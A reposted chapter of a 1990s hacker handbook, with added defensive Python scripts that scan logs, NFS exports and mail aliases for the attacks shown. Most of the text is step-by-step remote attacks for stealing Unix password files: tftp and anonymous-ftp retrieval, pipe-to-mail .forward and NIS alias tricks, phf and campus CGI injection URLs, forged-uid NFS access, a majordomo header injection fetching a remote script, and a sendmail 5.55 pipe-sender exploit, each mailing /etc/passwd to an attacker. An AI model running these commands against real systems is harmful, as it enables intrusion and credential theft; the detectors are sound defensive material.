samsa's Hacker Handbook (2)



         Author: [samsa]
    II. Striking the ox from across the mountain (remote attacks)
    1) Taking things from afar: obtaining passwd
    1.1) tftp
    # tftp numen
    tftp> get /etc/passwd
    Error code 2: Access violation
    tftp> get /etc/shadow
    Error code 2: Access violation
    tftp> quit
    (samsa: came up empty-handed, but...)
    # tftp sun8
    tftp> get /etc/passwd
    Received 965 bytes in 0.1 seconds
    tftp> get /etc/shadow
    Error code 2: Access violation
    (samsa: success!!! ;-)
    # cat passwd
    root:x:0:0:Super-User:/:/bin/ksh
    daemon:x:1:1::/:
    bin:x:2:2::/usr/bin:
    sys:x:3:3::/:/bin/sh
    adm:x:4:4:Admin:/var/adm:
    lp:x:71:8:Line Printer Admin:/usr/spool/lp:
    smtp:x:0:0:Mail Daemon User:/:
    uucp:x:5:5:uucp Admin:/usr/lib/uucp:
    nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
    listen:x:37:4:Network Admin:/usr/net/nls:
    nobody:x:60001:60001:Nobody:/:
    noaccess:x:60002:60002:No Access User:/:
    ylx:x:10007:10::/users/ylx:/bin/sh
    wzhou:x:10020:10::/users/wzhou:/bin/sh
    wzhang:x:10101:4:Walt Whiteman:/users/wzhang:/sbin/sh
    (samsa: a pity it is shadowed :-/)
    1.2) Anonymous ftp
    1.2.1) Getting it directly
    # ftp sun8
    Connected to sun8.
    220 sun8 FTP server (UNIX(r) System V Release 4.0) ready.
    Name (sun8:root): anonymous
    331 Guest login ok, send ident as password.
    Password:
    (samsa: your e-mail address, forged of course :->)
    230 Guest login ok, access restrictions apply.
    ftp> ls
    200 PORT command successful.
    150 ASCII data connection for /bin/ls (192.168.0.198,34243) (0 bytes).
    bin
    dev
    etc
    incoming
    pub
    usr
    226 ASCII Transfer complete.
    35 bytes received in 0.85 seconds (0.04 Kbytes/s)
    ftp> cd etc
    250 CWD command successful.
    ftp> ls
    200 PORT command successful.
    150 ASCII data connection for /bin/ls (192.168.0.198,34244) (0 bytes).
    group
    passwd
    226 ASCII Transfer complete.
    15 bytes received in 0.083 seconds (0.18 Kbytes/s)
    ftp> get passwd
    200 PORT command successful.
    150 ASCII data connection for passwd (192.168.0.198,34245) (223 bytes).
    226 ASCII Transfer complete.
    local: passwd remote: passwd
    231 bytes received in 0.038 seconds (5.98 Kbytes/s)
    # cat passwd
    root:x:0:0:Super-User:/:/bin/ksh
    daemon:x:1:1::/:
    bin:x:2:2::/usr/bin:
    sys:x:3:3::/:/bin/sh
    adm:x:4:4:Admin:/var/adm:
    uucp:x:5:5:uucp Admin:/usr/lib/uucp:
    nobody:x:60001:60001:Nobody:/:
    ftp:x:210:12::/export/ftp:/bin/false
    (samsa: as expected! Few fools leave the complete passwd in the anonymous ftp directory)
    1.2.2) ftp home directory writable
    # cat forward_sucker_file
    "| /bin/cat /etc/passwd|sed s/^/ /|/bin/mail [email protected]"
    # ftp victim.com
    Connected to victim.com
    220 victim FTP server ready.
    Name (victim.com:zen): ftp
    331 Guest login ok, send ident as password.
    Password:[your e-mail address:forged]
    230 Guest login ok, access restrictions apply.
    ftp> put forward_sucker_file .forward
    43 bytes sent in 0.0015 seconds (28 Kbytes/s)
    ftp> quit
    # echo test | mail [email protected]
    (samsa: now wait for the passwd file to arrive by mail...)
    1.3) WWW
    The famous big cgi bugs
    1.3.1) phf
    http://silly.com/cgi-bin/nph-test-cgi?*
    http://silly.com/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
    1.3.2) campus
    http://silly.edu/cgi-bin/campus?%0a/bin/cat%0a/etc/passwd
    1.3.3) glimpse
    http://silly.com/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5me\mailto:@my.e-mail.
    addr\ (samsa: the line was too long, so I folded it; no harm done, right? ;-)
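    A defender-side check for the CGI requests in 1.3, added here as an example and not part of samsa's handbook: it scans Common Log Format access-log lines for hits on the CGI programs named above and for a newline (%0a) or shell metacharacter in the URL-decoded request, which is the signature of these command-injection bugs. The log lines, hosts and timestamps are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); the clients,
# timestamps and the last two requests are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [11/May/1999:10:01:02 +0800] "GET /cgi-bin/phf?Qalias=x%0aless%20/etc/passwd HTTP/1.0" 200 512
10.0.0.5 - - [11/May/1999:10:01:09 +0800] "GET /cgi-bin/campus?%0a/bin/cat%0a/etc/passwd HTTP/1.0" 200 340
10.0.0.7 - - [11/May/1999:10:02:30 +0800] "GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5me HTTP/1.0" 404 0
10.0.0.9 - - [11/May/1999:10:03:00 +0800] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 1201
10.0.0.9 - - [11/May/1999:10:03:05 +0800] "GET /index.html HTTP/1.0" 200 2048
"""

# CGI programs named in the handbook; any request to them deserves a look.
KNOWN_BAD_CGI = {"phf", "nph-test-cgi", "campus", "aglimpse"}

# Characters that let a CGI argument become a shell command line.
META = re.compile(r"[\n|;`$]")

# client, timestamp, method, request target, status
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (client, path, reasons) for a suspicious CGI request, else None."""
    m = CLF.match(line)
    if not m:
        return None
    client, _, _, target, _ = m.groups()
    path, _, _query = target.partition("?")
    if not path.startswith("/cgi-bin/"):
        return None
    program = path.split("/")[2]      # /cgi-bin/<program>[/extra path]
    decoded = unquote(target)         # %0a -> newline, %20 -> space
    reasons = []
    if program in KNOWN_BAD_CGI:
        reasons.append("known-vulnerable cgi: " + program)
    if META.search(decoded):
        reasons.append("shell metacharacter after decoding")
    if "/etc/passwd" in decoded or "/etc/shadow" in decoded:
        reasons.append("references password file")
    return (client, path, reasons) if reasons else None

def scan(log_text):
    """All suspicious requests in a block of log text, in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for client, path, reasons in scan(SAMPLE_LOG):
        print(client, path, "; ".join(reasons))
```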
    1.4) nfs
    1.4.1) If /etc is exported, nothing more needs saying
    1.4.2) If some user's home directory is exported
    # showmount -e numen
    export list for numen:
    /space/users/lpf sun9
    /space/users/zw (everyone)
    # mount -F nfs numen:/space/users/zw /mnt
    # cd /mnt
    # ls -ld .
    drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .
    # echo zw:x:1005:1:temporary break-in account:/:/bin/sh >> /etc/passwd
    # echo zw::::::::: >> /etc/shadow
    # su zw
    $ cat >.forward
    "| /bin/cat /etc/passwd|sed s/^/ /|/bin/mail [email protected]"
    ^D
    # echo test | mail zw@numen
    (samsa: wait for your mail....)
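    An export audit from the defender's side, added as an example and not taken from the handbook: it parses output in the format of showmount -e, like the numen listing above, and flags exports to everyone, above all user home directories, because an NFS server believes whatever uid a client presents, which is exactly what the su zw step relies on. The listing is constructed; hosts and paths are made up.

```python
# Constructed sample in the format of "showmount -e", modelled on the numen
# listing above; the hosts and the extra paths are made up for this example.
SAMPLE_SHOWMOUNT = """\
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
/etc (everyone)
/export/tools sun9,sun8
"""

HOME_PREFIXES = ("/home/", "/users/", "/space/users/", "/export/home/")
SYSTEM_DIRS = {"/", "/etc", "/usr", "/var/yp"}

def parse_showmount(text):
    """Yield (path, clients) pairs; clients is ['(everyone)'] for a world export."""
    for line in text.splitlines():
        if line.startswith("export list") or not line.strip():
            continue
        parts = line.split()
        if len(parts) >= 2:
            yield parts[0], parts[1].split(",")

def audit(text):
    """Rank each export. System directories and world-exported home directories
    are high risk: any client that can mount them can present the owner's uid."""
    findings = []
    for path, clients in parse_showmount(text):
        world = "(everyone)" in clients
        norm = path.rstrip("/") or "/"
        if norm in SYSTEM_DIRS:
            findings.append((path, "high" if world else "medium", "system directory exported"))
        elif world and path.startswith(HOME_PREFIXES):
            findings.append((path, "high", "home directory exported to everyone"))
        elif world:
            findings.append((path, "medium", "exported to everyone"))
    return findings

if __name__ == "__main__":
    for path, level, why in audit(SAMPLE_SHOWMOUNT):
        print(f"{level:6} {path:20} {why}")
```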
    1.5) sniffer
    Exploit the broadcast nature of ethernet to eavesdrop on the IP packets passing over the network and thereby obtain passwords.
    For the principles and technical details of sniffers, see [samsa 1999].
    (samsa: not much fun; it feels like winning without honour...)
    1.6) NIS
    1.6.1) Guess the domain name, then ypcat (or niscat for NIS+) can obtain passwd (even shadow)
    1.6.2) If you can control the NIS server, you can create a mail alias
    nis-master # echo foo: "| mail [email protected] < /etc/passwd " >> /etc/aliases
    nis-master # cd /var/yp
    nis-master # make aliases
    nis-master # echo test | mail -v [email protected]
    1.7) e-mail
    e.g. exploiting a vulnerability in majordomo (ver. 1.94.3)
    Reply-to: a~.`/usr/bin/rcp\${IFS}[email protected]:script\${IFS}/tmp/script;;source\${IFS}/tmp/script`.q~a/ad=cucu/c=scapegoat\\\@his.e-mail
    # cat script
    /bin/cat /etc/passwd|sed s/^/ /|/bin/mail [email protected]
    #
    1.8) sendmail
    Exploiting the sendmail 5.55 vulnerability:
    # telnet victim.com 25
    Trying xxx.xxx.xxx.xxx...
    Connected to victim.com
    Escape character is ^].
    220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
    mail from: "|/bin/mail [email protected] < /etc/passwd"
    250 "|/bin/mail [email protected] < /etc/passwd"... Sender ok
    rcpt to: nosuchuser
    550 nosuchuser... User unknown
    data
    354 Enter mail, end with "." on a line by itself
    ..
    250 Mail accepted
    quit
    Connection closed by foreign host.
    (samsa:wait...)
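    The .forward trick in 1.2.2 and 1.4.2, the NIS alias in 1.6.2 and the sendmail 5.55 envelope sender in 1.8 all rest on the same thing: a mail address that begins with "|", which sendmail hands to a program instead of a mailbox. An added example, not from the handbook, that scans an aliases file, .forward contents and envelope senders for that pattern; the files and the attacker@example.invalid address are constructed placeholders.

```python
import re

# Constructed samples; the mail addresses are placeholders, not real accounts.
SAMPLE_ALIASES = """\
# /etc/aliases (constructed)
postmaster: root
foo: "| mail attacker@example.invalid < /etc/passwd "
lists: :include:/etc/mail/lists
"""
SAMPLE_FORWARDS = {
    "/export/ftp/.forward": '"| /bin/cat /etc/passwd|sed s/^/ /|/bin/mail attacker@example.invalid"',
    "/users/wzhou/.forward": "wzhou@mailhost",
}
SAMPLE_SENDERS = [
    '"|/bin/mail attacker@example.invalid < /etc/passwd"',
    "wzhang@numen",
]

# A delivery target that starts with "|" (optionally inside double quotes)
# is run as a command by sendmail rather than delivered to a mailbox.
PIPE = re.compile(r'^\s*"?\s*\|')

def pipe_aliases(text):
    """Alias names whose right-hand side pipes mail into a program."""
    hits = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        name, sep, target = line.partition(":")
        if sep and PIPE.match(target):
            hits.append(name.strip())
    return hits

def pipe_forwards(files):
    """Paths of .forward files that pipe into a program. A service account such
    as ftp should not have a .forward at all, nor a home it can write to."""
    return [path for path, body in files.items() if PIPE.match(body)]

def pipe_senders(senders):
    """Envelope senders that are really pipe commands (the sendmail 5.55 case)."""
    return [s for s in senders if PIPE.match(s)]

if __name__ == "__main__":
    print(pipe_aliases(SAMPLE_ALIASES))
    print(pipe_forwards(SAMPLE_FORWARDS))
    print(pipe_senders(SAMPLE_SENDERS))
```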

    Posted by: netbull  Source: sinbad Network Security